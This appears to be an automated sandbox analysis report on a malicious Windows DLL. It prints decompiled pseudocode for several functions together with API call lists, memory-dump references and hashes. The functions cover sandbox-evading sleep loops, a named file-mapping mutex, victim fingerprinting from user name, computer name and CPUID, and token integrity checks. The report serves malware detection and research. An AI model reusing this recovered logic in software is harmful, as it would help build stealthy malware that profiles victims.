Instruction Fuzzy Hash: CB515B71905228AADB11DFD8DD44DEEBFBCEB49760F20C116F818A21A1D7719A85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E0517A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E0517A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6E05146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6E0515A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6E051C12(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6E051CA4(E6E0516EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6E051D7C(_t45,  &_v48) != 0) {
					 *0x6e0541b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6e0541b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6E051C8F(_t50 + _t15);
				 *0x6e0541b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6E05136A(_t44);
					goto L11;
				}
			}

APIs

Part of subcall function 6E05146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0517B8,73B763F0,00000000), ref: 6E05147B
Part of subcall function 6E05146C: GetVersion.KERNEL32 ref: 6E05148A
Part of subcall function 6E05146C: GetCurrentProcessId.KERNEL32 ref: 6E051499
Part of subcall function 6E05146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0514B2

GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6E0517CB
SwitchToThread.KERNEL32 ref: 6E0517D1

Part of subcall function 6E0515A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6E0515F9
Part of subcall function 6E0515A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6E0517EC), ref: 6E05168B
Part of subcall function 6E0515A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6E0516A6

Sleep.KERNELBASE(00000000,00000000), ref: 6E0517F4
GetLongPathNameW.KERNELBASE ref: 6E05183C
GetLongPathNameW.KERNELBASE ref: 6E05185A
WaitForSingleObject.KERNEL32(00000000,000000FF,6E0516EC,?,00000000), ref: 6E05188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 6E0518A0
CloseHandle.KERNEL32(00000000), ref: 6E0518A7
GetLastError.KERNEL32(6E0516EC,?,00000000), ref: 6E0518AF
GetLastError.KERNEL32 ref: 6E0518C2

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: ed95a290e3b3bcbf8c20b65269417d1dcb0e9b200fc8e0e7476b44c03d647003
Instruction ID: 73df094d14b09fda9497128790b28c4241294c38b37dfd2d5e6384718fc149a8
Opcode Fuzzy Hash: ed95a290e3b3bcbf8c20b65269417d1dcb0e9b200fc8e0e7476b44c03d647003
Instruction Fuzzy Hash: 88316471804F11ABD760DFE58A48BAF77ECEF8A754B100E1AF465C2344E734C918CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E051979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E051979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E052210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e0541d0;
				_push(_t15 + 0x6e05505e);
				_push(_t15 + 0x6e055054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E05220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e0541c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?,?), ref: 6E051986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E05199C
_snwprintf.NTDLL ref: 6E0519C1
CreateFileMappingW.KERNELBASE(000000FF,6E0541C0,00000004,00000000,?,?), ref: 6E0519E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E0519FD
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E051A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E051A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A), ref: 6E051A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E051A3A

Memory Dump Source

Source File: 00000002.00000002.1182842141.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true

Associated: 00000002.00000002.1182812116.000000006E050000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182861845.000000006E053000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1182891522.000000006E055000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1182918406.000000006E056000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: d4225c4db406d57759aaf396adf4b52919de734fd60f7bbb562b7a107fc6666a
Instruction ID: f16992ede6e9b1fa1a308e8e7d2eff0443640e5d4db6832e5b67cda52e88a40c
Opcode Fuzzy Hash: d4225c4db406d57759aaf396adf4b52919de734fd60f7bbb562b7a107fc6666a
Instruction Fuzzy Hash: A421F2B6500608BFDB02AFE8DE98FDE37BCEB49394F004425F611E7240E6709868CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A757AD, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00A757AD(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00A77F50();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xa7a2d0; // 0x4aed5a8
				_t5 = _t13 + 0xa7b84d; // 0x5568df5
				_t6 = _t13 + 0xa7b580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00A77C2A();
				_t17 = CreateFileMappingW(0xffffffff, 0xa7a2d4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00a757ad
0x00a757b5
0x00a757b9
0x00a757bf
0x00a757c4
0x00a757c9
0x00a757cc
0x00a757cf
0x00a757d4
0x00a757d5
0x00a757d8
0x00a757dd
0x00a757e4
0x00a757ee
0x00a757f0
0x00a757f1
0x00a757f4
0x00a75810
0x00a75816
0x00a7581a
0x00a75868
0x00a7581c
0x00a75829
0x00a75839
0x00a75841
0x00a75853
0x00a75857
0x00000000
0x00000000
0x00a75843
0x00a75846
0x00a7584b
0x00a7584d
0x00a7584d
0x00a7582b
0x00a7582d
0x00a75859
0x00a7585a
0x00a7585a
0x00a75829
0x00a7586f

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00A72DF9,?,00000001,?), ref: 00A757B9
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A757CF
_snwprintf.NTDLL ref: 00A757F4
CreateFileMappingW.KERNELBASE(000000FF,00A7A2D4,00000004,00000000,00001000,?), ref: 00A75810
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A72DF9,?), ref: 00A75822
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00A75839
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A72DF9), ref: 00A7585A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A72DF9,?), ref: 00A75862

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 4c209f85cca34efc78184e1e0841044c9a44a776870c472e6de7aad4ec616919
Instruction ID: 0e38908b9684886537623fab7f9c6f48a3d37b2b54d89c2d267c01510cd99ee8
Opcode Fuzzy Hash: 4c209f85cca34efc78184e1e0841044c9a44a776870c472e6de7aad4ec616919
Instruction Fuzzy Hash: 54218E72A00604BBD711DBA4CC05F9E77B9AF84750F24C065FA0EEA191EAB099429B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A73946, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00A73946(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xa7a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E00A7354E( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xa7a2cc ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xa7a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00A73F12(_v8 + _v8, _t63);
							}
							HeapFree( *0xa7a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xa7a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00A73F12(_v8 + _v8, _t63);
						}
						HeapFree( *0xa7a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x00a73946
0x00a7394e
0x00a73954
0x00a73957
0x00a7395a
0x00a7395c
0x00a73961
0x00a73961
0x00a73967
0x00a73969
0x00a73976
0x00a739d7
0x00a73978
0x00a7397d
0x00a73983
0x00a73988
0x00a73996
0x00a7399a
0x00a739a9
0x00a739b0
0x00a739b7
0x00a739b7
0x00a739c2
0x00a739c2
0x00a7399a
0x00a73988
0x00a739d9
0x00a739df
0x00a739e9
0x00a739eb
0x00a739f0
0x00a739ff
0x00a73a03
0x00a73a0e
0x00a73a15
0x00a73a1c
0x00a73a1c
0x00a73a28
0x00a73a28
0x00a73a03
0x00a73a31
0x00a73a33
0x00a73a36
0x00a73a38
0x00a73a3b
0x00a73a3e
0x00a73a48
0x00a73a4c
0x00a73a50

APIs

GetUserNameW.ADVAPI32(00000000,00A72F3F), ref: 00A7397D
RtlAllocateHeap.NTDLL(00000000,00A72F3F), ref: 00A73994
GetUserNameW.ADVAPI32(00000000,00A72F3F), ref: 00A739A1
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00A72F3F,?,?,?,?,?,00A744F9,?,00000001), ref: 00A739C2
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A739E9
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A739FD
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A73A0A
HeapFree.KERNEL32(00000000,00000000), ref: 00A73A28

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapName$AllocateComputerFreeUser
String ID:
API String ID: 3239747167-0
Opcode ID: 2d2bee0150866141d632ee360dc1227343f36be0942cb58988e6ef689c500cd1
Instruction ID: 5b75ef213e310edccfca82955e7348e3df78f8ff9b18563b26dcbc6da4e6887e
Opcode Fuzzy Hash: 2d2bee0150866141d632ee360dc1227343f36be0942cb58988e6ef689c500cd1
Instruction Fuzzy Hash: D9313C72A10209EFDB11DFA9DC81AAEB7F9EB94300F11C429E549E3221D770DE41AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A72D63, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A72D63(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E00A75901();
				if(_t27 != 0) {
					_t77 =  *0xa7a2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0xa7a2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0xa7a14c(0, 2);
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00A74097( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xa7a2d0; // 0x4aed5a8
					_push(0xa7a2d8);
					_push(1);
					_t7 = _t32 + 0xa7b5bc; // 0x4d283a53
					 *0xa7a2d4 = 0xc;
					 *0xa7a2dc = 0;
					L00A75EC2();
					_t36 = E00A757AD(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00A73946(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00A75C4E(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xa7a2d0; // 0x4aed5a8
								_t18 = _t64 + 0xa7b916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xa7a328 = _t87;
						}
						_t38 = E00A72304();
						 *0xa7a2c8 =  *0xa7a2c8 ^ 0xe8fa7dd7;
						 *0xa7a318 = _t38;
						_t39 = E00A75C4E(0x60);
						__eflags = _t39;
						 *0xa7a37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xa7a37c; // 0x5569630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xa7a37c; // 0x5569630
							 *_t56 = 0xa7b882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xa7a290, _t84, 0x52);
							__eflags = _t42;
							 *0xa7a310 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xa7a2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xa7a2d0; // 0x4aed5a8
								_t19 = _t76 + 0xa7b212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xa792c7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00A73946( ~_v8 &  *0xa7a2c8, 0xa7a00c); // executed
								_t84 = E00A7374B(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00A73E8F(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00A71B47(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00A75D26(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xa7a150();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00A763CD(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x00a72d63
0x00a72d6e
0x00a72d71
0x00a72d74
0x00a72d77
0x00a72d7e
0x00a72d80
0x00a72d8c
0x00a72d8e
0x00a72d8e
0x00a72d97
0x00a72d9f
0x00a72da2
0x00a72dbc
0x00a72dc1
0x00a72dc2
0x00a72dc4
0x00a72dc9
0x00a72dce
0x00a72dd0
0x00a72dd7
0x00a72de1
0x00a72de7
0x00a72df4
0x00a72dfb
0x00a72e00
0x00a72e00
0x00a72e09
0x00a72e32
0x00a72e35
0x00a72e42
0x00a72e49
0x00a72e55
0x00a72e57
0x00a72e59
0x00a72e5e
0x00a72e64
0x00a72e6a
0x00a72e70
0x00a72e73
0x00a72e78
0x00a72e80
0x00a72e82
0x00a72e82
0x00a72e85
0x00a72e85
0x00a72e8b
0x00a72e90
0x00a72e98
0x00a72e9d
0x00a72ea2
0x00a72ea4
0x00a72ea9
0x00a72ed8
0x00a72eab
0x00a72eb0
0x00a72eb5
0x00a72eba
0x00a72ec1
0x00a72ec7
0x00a72ecc
0x00a72ed2
0x00a72ed2
0x00a72ed9
0x00a72edb
0x00a72eea
0x00a72ef0
0x00a72ef2
0x00a72ef7
0x00a72f23
0x00a72ef9
0x00a72ef9
0x00a72eff
0x00a72f0c
0x00a72f12
0x00a72f12
0x00a72f1a
0x00a72f1c
0x00a72f24
0x00a72f26
0x00a72f2d
0x00a72f3a
0x00a72f44
0x00a72f46
0x00a72f48
0x00000000
0x00000000
0x00a72f4a
0x00a72f4f
0x00a72f51
0x00a72f58
0x00a72f5c
0x00a72f5f
0x00a72f74
0x00a72f78
0x00a72f7d
0x00000000
0x00a72f7d
0x00a72f61
0x00a72f63
0x00000000
0x00000000
0x00a72f65
0x00a72f6e
0x00a72f70
0x00a72f72
0x00000000
0x00000000
0x00000000
0x00a72f72
0x00a72f55
0x00a72f55
0x00a72f26
0x00a72e0b
0x00a72e0b
0x00a72e10
0x00a72f7f
0x00a72f83
0x00a72f8b
0x00a72f8b
0x00000000
0x00a72f83
0x00a72e16
0x00a72e19
0x00a72e19
0x00a72e1b
0x00a72e1e
0x00a72e26
0x00a72e2d
0x00000000
0x00a72f93
0x00a72f93
0x00a72f96
0x00a72f9b
0x00a72f9b

APIs

Part of subcall function 00A75901: GetModuleHandleA.KERNEL32(4C44544E,00000000,00A72D7C,00000000,00000000,00000000,?,?,?,?,?,00A744F9,?,00000001), ref: 00A75910

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00A7A2D8,00000000), ref: 00A72DE7
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00A744F9,?,00000001), ref: 00A72E00
wsprintfA.USER32 ref: 00A72E80
memset.NTDLL ref: 00A72EB0
RtlInitializeCriticalSection.NTDLL(055695F0), ref: 00A72EC1
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00A72EEA
wsprintfA.USER32 ref: 00A72F1A

Part of subcall function 00A73946: GetUserNameW.ADVAPI32(00000000,00A72F3F), ref: 00A7397D
Part of subcall function 00A73946: RtlAllocateHeap.NTDLL(00000000,00A72F3F), ref: 00A73994
Part of subcall function 00A73946: GetUserNameW.ADVAPI32(00000000,00A72F3F), ref: 00A739A1
Part of subcall function 00A73946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00A72F3F,?,?,?,?,?,00A744F9,?,00000001), ref: 00A739C2
Part of subcall function 00A73946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A739E9
Part of subcall function 00A73946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00A739FD
Part of subcall function 00A73946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00A73A0A
Part of subcall function 00A73946: HeapFree.KERNEL32(00000000,00000000), ref: 00A73A28

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: ee4db544c44976499c01269143eed36851f1c08e55db1b0014f829e4a47ca958
Instruction ID: ddfba044cdbca9d0ecc1406284058d072ed4d452bd8e5d99a14c7e602330abfe
Opcode Fuzzy Hash: ee4db544c44976499c01269143eed36851f1c08e55db1b0014f829e4a47ca958
Instruction Fuzzy Hash: DD51F372E40214BFDB21DBA4DC89FAE77B8AB54710F10C115F90DEB261E7719D828BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A71041, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A71041(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xa7a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00A75C4E(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00A72A03(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00a7104e
0x00a71055
0x00a7105c
0x00a71070
0x00a7107b
0x00a71093
0x00a710a0
0x00a710a3
0x00a710a8
0x00a710b3
0x00a710b7
0x00a710c6
0x00a710ca
0x00a710e6
0x00a710e6
0x00a710ea
0x00a710ea
0x00a710ef
0x00a710f3
0x00a710f9
0x00a710fa
0x00a71101
0x00a71107

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00A71073
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00A71093
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00A710A3
CloseHandle.KERNEL32(00000000), ref: 00A710F3

Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00A710C6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00A710CE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00A710DE

Memory Dump Source

Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 91e46afd7a414c0821007af1bc718cc08b3d68c118c9f22006d78fe4b428a673
Instruction ID: f4217de10b2db4c559cf0fb9a7a55717e9efc78c2a7988ce573898ab9009a8c9
Opcode Fuzzy Hash: 91e46afd7a414c0821007af1bc718cc08b3d68c118c9f22006d78fe4b428a673
Instruction Fuzzy Hash: 75215C75900249FFEB10DFD4DD44EEEBBBDFB44300F008065E514A2161DB714A86EB50

Uniqueness

Uniqueness Score: -1.00%

